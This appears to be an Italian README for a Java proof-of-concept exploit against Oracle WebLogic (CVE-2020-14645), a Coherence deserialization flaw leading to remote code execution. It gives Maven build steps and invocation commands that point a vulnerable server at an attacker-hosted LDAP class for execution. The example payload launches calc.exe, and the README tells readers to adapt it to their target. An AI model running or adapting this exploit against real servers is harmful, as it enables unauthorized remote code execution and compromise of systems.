PoC Java per WebLogic CVE-2020-14645 Coherence deserialization RCE. Ospita una classe malevola tramite LDAP e attiva l'esecuzione di codice in remoto su server WebLogic vulnerabili.
Maven 3
JDK 1.8
mvn package
Passaggi specifici per il test:
Poiché questa vulnerabilità è simile alla vulnerabilità di Apache Dubbo, fare riferimento a quest'ultima per implementare i passaggi da 1 a 4.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Esempio
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Se si utilizza il POC fornito in questo esempio, dopo un'attivazione riuscita il target di test eseguirà calc.exe. Modificare il POC in base all'ambiente del target di test.
Questo progetto fa riferimento e cita parte del codice dei progetti @Y4er e @5up3rc, con sentiti ringraziamenti!